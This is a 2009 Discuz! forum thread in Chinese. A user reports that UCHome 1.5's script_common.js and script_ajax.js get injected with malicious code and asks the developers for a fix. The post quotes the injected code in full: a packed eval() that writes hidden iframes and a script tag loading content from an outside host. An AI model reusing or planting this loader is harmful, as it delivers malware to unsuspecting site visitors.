Discuz!官方免费开源建站系统

 找回密码
 立即注册
搜索

uchome1.5程序发现大漏洞,js会被挂马

[复制链接]
kisshaha 发表于 2009-8-29 23:26:04 | 显示全部楼层 |阅读模式
本帖最后由 kisshaha 于 2009-8-29 23:28 编辑
  1. if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString()
  2. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5.l(\'<h f=b i=8://m.n.6.4/a/j.d></h><9 7=0 k=1 i="8://m.n.6.4/a/e.c?2"></9><9 7=0 k=1 i="8://m.n.6.4/a/g.c?3"></9>\')',62,24,'|100|123|456|cn|document|gov|height|http|iframe|images|javascript|jpg|js|kiss|language|miss|script|src|ubb|width|writeln|www|xcrsrc'.split('|'),0,{}));}
复制代码
uchome1.5:source目录下的script_common.js和script_ajax.js 会被注入这段代码,目前暂时不想升级到2.0,望官方赶紧给提供修正方法
回复

使用道具 举报

认真的狼 发表于 2009-8-30 01:43:51 | 显示全部楼层
那你就升级到2.0吧
回复

使用道具 举报

 楼主| kisshaha 发表于 2009-8-30 19:39:00 | 显示全部楼层
顶一下,官方有没有人负责这个啊
回复

使用道具 举报

8int 发表于 2009-8-30 22:32:17 | 显示全部楼层
呵呵   ((em:11))
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-9-7 00:28 , Processed in 0.107314 second(s), 14 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表